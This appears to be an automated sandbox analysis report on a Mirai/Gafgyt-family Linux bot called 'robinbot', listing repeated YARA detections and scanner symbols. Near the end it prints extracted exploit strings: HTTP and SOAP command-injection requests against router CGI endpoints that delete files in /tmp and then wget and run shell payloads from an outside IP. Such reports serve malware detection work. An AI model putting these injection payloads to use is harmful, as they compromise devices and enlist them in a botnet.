              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: Initial samplePotential command found: GET / HTTP/1.1
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcron
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.sh
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bins.sh;chmod+777+bins.sh;sh+bins.sh+b HTTP/1.1
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.203.251.188/bins.sh;sh${IFS}/tmp/bins.sh&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcronGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.shPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: robinbotELF static info symbol of initial sample: scanner.c
              Source: robinbotELF static info symbol of initial sample: scanner10_pid
              Source: robinbotELF static info symbol of initial sample: scanner11_pid
              Source: robinbotELF static info symbol of initial sample: scanner12_pid
              Source: robinbotELF static info symbol of initial sample: scanner13_pid
              Source: robinbotELF static info symbol of initial sample: scanner2_pid
              Source: robinbotELF static info symbol of initial sample: scanner3_pid
              Source: robinbotELF static info symbol of initial sample: scanner4_pid
              Source: robinbotELF static info symbol of initial sample: scanner5_pid
              Source: robinbotELF static info symbol of initial sample: scanner6_pid
              Source: robinbotELF static info symbol of initial sample: scanner7_pid
              Source: robinbotELF static info symbol of initial sample: scanner8_pid
              Source: robinbotELF static info symbol of initial sample: scanner9_pid
              Source: robinbotELF static info symbol of initial sample: scanner_init
              Source: robinbotELF static info symbol of initial sample: scanner_kill
              Source: robinbotELF static info symbol of initial sample: scanner_pid
              Source: robinbotELF static info symbol of initial sample: scanner_rawpkt
              Source: Initial sampleString containing 'busybox' found: orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
